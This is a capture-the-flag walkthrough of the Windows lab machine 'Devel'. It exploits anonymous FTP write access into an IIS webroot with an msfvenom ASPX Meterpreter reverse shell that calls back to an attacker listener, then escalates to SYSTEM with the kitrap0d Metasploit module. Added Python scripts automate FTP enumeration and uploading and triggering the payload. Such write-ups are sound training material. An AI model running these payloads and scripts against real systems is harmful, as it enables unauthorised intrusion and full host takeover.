Devel
Difficulty: Easy - OS: Windows
¯\_( ͡° ͜ʖ ͡°)_/¯ Machine info
Devel is an introductory machine built to demonstrate the risk of default configurations on Windows systems. Basic reconnaissance identifies two main vectors: a Microsoft FTP server and an IIS web server running on the same host. Anonymous access enabled on the FTP service, combined with write permission into the web server's public directory, lets an attacker upload executable files, and that becomes the entry point for remote exploitation.
By uploading a reverse shell in ASPX form, a Meterpreter session is obtained that allows remote command execution. Once inside, the goal shifts to privilege escalation. Because the target is a 32-bit Windows 7 build (6.1.7600), Metasploit's local exploit modules apply, and in particular exploit/windows/local/ms10_015_kitrap0d succeeds in elevating privileges to NT AUTHORITY\SYSTEM.
The box highlights the importance of correctly configuring network-exposed services, and the value of automated exploitation and post-exploitation tooling in Windows environments.
Port/service enumeration
┌──(root㉿kali)-[/home/kali/Documents/HTB]
└─# nmap -sCV --open -T4 -v -n 10.10.10.5
📌 Parameters
-sC → Runs the default script set → uses the nmap NSE scripts under /usr/share/nmap/scripts/, which gather extra information from the open ports (here: ftp-anon, ftp-syst, http-methods, http-title).
-sV → Version detection → tries to identify the software and version behind each open port.
-n → No DNS resolution → skips reverse lookups, which shortens the scan.
--open → Shows only open ports → filters closed and filtered ports out of the output.
-T4 → Timing template → the "aggressive" level speeds the scan up; fine on fast, reliable links.
-v → Verbose mode → prints more detail on scan progress.
Result:
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 04-30-25 06:46AM 2943 exp.aspx
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Right away we see that nmap logged in as anonymous on port 21 (ftp) and listed the files hosted there, and that port 80 runs Microsoft-IIS/7.5. The listing itself is telling: aspnet_client, iisstart.htm and welcome.png are the default contents of an IIS wwwroot, so the FTP root is very likely the web server's document root.
File and permission enumeration via FTP
┌──(root㉿kali)-[/home/kali/Documents/HTB/DEVEL]
└─# python3 ftpmap.py 10.10.10.5 anonymous
[+] IP: 10.10.10.5:21 Name: 10.10.10.5 Status: Authenticated
Path Read Write Comment
------------------------------------------------------------ ---------- ---------- --------------------
/aspnet_client/ - - FTP directory
/aspnet_client/system_web/ - - FTP directory
/aspnet_client/system_web/2_0_50727/ - - FTP directory
/exp.aspx YES - FTP file
/iisstart.htm YES - FTP file
/welcome.png YES - FTP file
Of everything ftpmap enumerated, the file that matters is exp.aspx: it is ASP.NET code, which IIS executes on request, and its timestamp (04-30-25, versus 2017 for the default IIS files) shows that someone has already dropped an .aspx into this directory and it is still there. That tells us two things: the FTP root is the IIS webroot, and an uploaded file with that extension will run server-side. Note that ftpmap reports no write flag on the existing entries, but that check does not rule out creating new files; the put below shows that anonymous uploads succeed. A quick sanity check before uploading anything is to request http://10.10.10.5/iisstart.htm or http://10.10.10.5/welcome.png and confirm the same files come back over HTTP. The next step is to build our payload with msfvenom to obtain a reverse shell.
Abusing the weak configuration
┌──(root㉿kali)-[/home/kali/Documents/HTB/DEVEL]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx -o backdoor.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2902 bytes
Saved as: backdoor.aspx
Upload the payload to the FTP server. Run the ftp client from the directory that contains backdoor.aspx (or pass the full local path to put); otherwise the transfer fails because the client cannot find the file.
ftp> put backdoor.aspx
local: backdoor.aspx remote: backdoor.aspx
229 Entering Extended Passive Mode (|||49201|)
125 Data connection already open; Transfer starting.
100% |**********************************************************| 2942 3.40 MiB/s --:-- ETA
226 Transfer complete.
2942 bytes sent in 00:00 (12.39 KiB/s)
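The following is an added example written for this page; it is not the write-up's ftpmap.py nor any tool the write-up names. It reproduces, with only the Python standard library, the two FTP-side checks the sections above rely on: parse the Windows-style listing and flag files IIS would execute, then prove that the FTP root is the IIS document root by uploading a random marker and reading it back over HTTP, and finally the put-plus-GET step that triggers an uploaded .aspx. Host, ports and file names match the write-up; the marker name wr_probe.txt and the anonymous e-mail password are my assumptions.

```python
"""Added example (not the write-up's code): anonymous FTP enumeration,
IIS-executable detection, and an FTP-root == webroot proof for 10.10.10.5."""
import io
import re
import secrets
import ftplib
import urllib.request
from dataclasses import dataclass

# Extensions IIS maps to its script handlers: writable webroot + one of these
# is remote code execution (exp.aspx / backdoor.aspx on this box).
SERVER_EXECUTABLE = {".aspx", ".asp", ".ashx", ".asmx"}

# Microsoft ftpd LIST line: "03-18-17  02:06AM       <DIR>          aspnet_client"
LISTING_RE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{1,2}:\d{2}[AP]M)\s+"
    r"(?P<size><DIR>|\d+)\s+(?P<name>.+?)\s*$"
)


@dataclass(frozen=True)
class Entry:
    name: str
    is_dir: bool
    size: int
    date: str  # MM-DD-YY exactly as the Windows FTP service prints it

    @property
    def server_executable(self) -> bool:
        _, dot, ext = self.name.rpartition(".")
        return not self.is_dir and dot == "." and f".{ext}".lower() in SERVER_EXECUTABLE


def parse_windows_listing(lines):
    """Parse raw LIST output, or nmap's '| '-prefixed copy of it."""
    entries = []
    for line in lines:
        line = re.sub(r"^\|_?\s*", "", line.strip())  # drop the nmap script prefix
        m = LISTING_RE.match(line)
        if not m:
            continue  # SYST lines, blanks, anything that is not a directory entry
        is_dir = m["size"] == "<DIR>"
        entries.append(Entry(m["name"], is_dir, 0 if is_dir else int(m["size"]), m["date"]))
    return entries


def anonymous_ftp(host, port=21, timeout=10):
    """Open an anonymous session; raises ftplib.error_perm if the server refuses."""
    ftp = ftplib.FTP()
    ftp.connect(host, port, timeout=timeout)
    ftp.login("anonymous", "anonymous@example.com")  # assumed password, any works here
    return ftp


def ftp_root_is_webroot(ftp, http_base, marker="wr_probe.txt", timeout=10):
    """Upload a random token over FTP and read it back over HTTP.
    True only if the exact token is served: the FTP root is the IIS document
    root AND anonymous can create files in it. The marker is removed afterwards."""
    token = secrets.token_hex(16).encode()
    try:
        ftp.storbinary(f"STOR {marker}", io.BytesIO(token))
    except ftplib.error_perm:
        return False  # no anonymous write: the whole attack path is closed
    try:
        with urllib.request.urlopen(f"{http_base}/{marker}", timeout=timeout) as r:
            served = r.read().strip() == token
    except Exception:
        served = False
    finally:
        try:
            ftp.delete(marker)  # leave no artefact behind
        except ftplib.error_perm:
            pass
    return served


def upload_and_trigger(ftp, http_base, local_path, remote_name, timeout=5):
    """The write-up's 'put backdoor.aspx' plus the GET that makes IIS run it.
    The HTTP response is irrelevant (the payload calls back to the listener),
    so errors and timeouts from the request are ignored."""
    with open(local_path, "rb") as f:
        ftp.storbinary(f"STOR {remote_name}", f)
    try:
        urllib.request.urlopen(f"{http_base}/{remote_name}", timeout=timeout).read()
    except Exception:
        pass


if __name__ == "__main__":
    HOST, HTTP = "10.10.10.5", "http://10.10.10.5"
    ftp = anonymous_ftp(HOST)
    raw = []
    ftp.retrlines("LIST", raw.append)
    for e in parse_windows_listing(raw):
        flag = "  <- executed by IIS" if e.server_executable else ""
        print(f"{'d' if e.is_dir else '-'} {e.size:>8} {e.date} {e.name}{flag}")
    print("anonymous write into webroot:", ftp_root_is_webroot(ftp, HTTP))
    ftp.quit()
```

The marker test is stronger than just fetching iisstart.htm: a default page could be served from a different directory than the FTP root, whereas a random token that round-trips through FTP and HTTP proves the two paths are the same and that anonymous can write there.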
Remote command execution (RCE)
Once the payload is uploaded, all that remains is to start the listener in msfconsole (exploit/multi/handler with the same payload, LHOST and LPORT used in msfvenom) and trigger the payload by requesting it from the web server (http://10.10.10.5/backdoor.aspx).
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set lhost 10.10.14.7
lhost => 10.10.14.7
msf6 exploit(multi/handler) > options
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process,
none)
LHOST 10.10.14.7 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Sending stage (177734 bytes) to 10.10.10.5
[*] Meterpreter session 11 opened (10.10.14.7:4444 -> 10.10.10.5:49217) at 2025-05-02 01:50:36 -0400
meterpreter >
Post-exploitation and internal reconnaissance
For privilege escalation we use the module post/multi/recon/local_exploit_suggester, which runs the check method of every local exploit module matching the session's platform and architecture and lists the ones that report the target as potentially vulnerable.
meterpreter > background
[*] Backgrounding session 11...
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester . normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the avai
lable exploits
msf6 post(multi/recon/local_exploit_suggester) > set session 11
session => 11
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 204 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 10.10.10.5 - Valid modules for session 11:
=============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_comhijack Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
4 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
5 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
6 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable.
7 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable.
8 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
9 exploit/windows/local/ms15_004_tswbproxy Yes The service is running, but could not be validated.
10 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
11 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
12 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
13 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
14 exploit/windows/local/ms16_075_reflection_juicy Yes The target appears to be vulnerable.
15 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
16 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
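The suggester prints two different verdicts under the same [+] prefix: "The target appears to be vulnerable." means the module's check method confirmed the bug, while "could not be validated" only means the check could not decide either way. The following is an added example written for this page (not a Metasploit feature) that parses the output above into a ranked list for a manual run. The sample text is the write-up's own suggester output; the rule that bypassuac_* modules are irrelevant unless the session already belongs to an administrator is my addition, and it matters here because this shell runs as the IIS application pool identity, not as an admin user.

```python
"""Added example (not the write-up's code): triage local_exploit_suggester output."""
import re
from dataclasses import dataclass

# Copied from the write-up's suggester run against 10.10.10.5.
SUGGESTER_OUTPUT = """\
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 204 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
"""

ARCH_RE = re.compile(r"Collecting local exploits for (?P<arch>\w+)/(?P<platform>\w+)")
RESULT_RE = re.compile(r"^\[\+\]\s+\S+\s+-\s+(?P<module>exploit/[^\s:]+):\s+(?P<msg>.+)$")
CONFIRMED = "The target appears to be vulnerable."


@dataclass(frozen=True)
class Suggestion:
    module: str
    confirmed: bool  # the module's check() positively identified the bug
    detail: str      # anything the check printed after its verdict sentence

    @property
    def uac_bypass(self) -> bool:
        # Assumption documented in the lead-in: bypassuac_* only raises integrity
        # for a user already in Administrators; useless for a service identity.
        return "/bypassuac_" in self.module


def parse_suggester(text):
    """Return (arch, platform, [Suggestion, ...]) in the order printed."""
    arch = platform = None
    found = []
    for line in text.splitlines():
        a = ARCH_RE.search(line)
        if a:
            arch, platform = a["arch"], a["platform"]
            continue
        m = RESULT_RE.match(line.strip())
        if not m:
            continue
        msg = m["msg"].strip()
        confirmed = msg.startswith(CONFIRMED)
        detail = msg[len(CONFIRMED):] if confirmed else msg.partition(". ")[2]
        found.append(Suggestion(m["module"], confirmed, detail.strip()))
    return arch, platform, found


def triage(text, already_admin=False):
    """Order candidates for a manual run: confirmed privilege escalations first,
    then unvalidated ones whose check still printed a build hint, then the rest.
    UAC bypasses are dropped unless the session already belongs to an admin."""
    _, _, found = parse_suggester(text)
    usable = [s for s in found if already_admin or not s.uac_bypass]
    return sorted(usable, key=lambda s: (not s.confirmed, not s.detail))


if __name__ == "__main__":
    arch, platform, _ = parse_suggester(SUGGESTER_OUTPUT)
    print(f"session arch/platform: {arch}/{platform}")
    for s in triage(SUGGESTER_OUTPUT):
        tag = "CONFIRMED  " if s.confirmed else "unvalidated"
        print(f"{tag} {s.module} {s.detail}")
```

Note that ms10_015_kitrap0d lands in the lowest tier of this ranking, and it is still the one that worked below: an unvalidated verdict is a statement about the check method, not about the bug, so the ranking is a starting order, not a verdict.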
Local privilege escalation
The exploit we will use here is exploit/windows/local/ms10_015_kitrap0d; the only options to set are lhost and the Meterpreter session that holds our active reverse shell. The suggester marked it as "could not be validated", but the session is x86/windows on an unpatched Windows 7 build (6.1.7600, as the shell banner below shows), which is exactly what kitrap0d targets. If the original multi/handler were still listening on 4444 you would also need a different LPORT; here the default is free again, so it can stay.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.7
lhost => 10.10.14.7
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 11
session => 11
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 2788 launched.
[*] Reflectively injecting the DLL into 2788...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 10.10.10.5
[*] Meterpreter session 12 opened (10.10.14.7:4444 -> 10.10.10.5:49218) at 2025-05-02 02:01:23 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2080 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>type \Users\babis\Desktop\user.txt
type \Users\babis\Desktop\user.txt
7f47****************************
c:\windows\system32\inetsrv>type \Users\Administrator\Desktop\root.txt
type \Users\Administrator\Desktop\root.txt
7cb3****************************
Finally, we grab the flags ( ͡° ͜ʖ ͡°)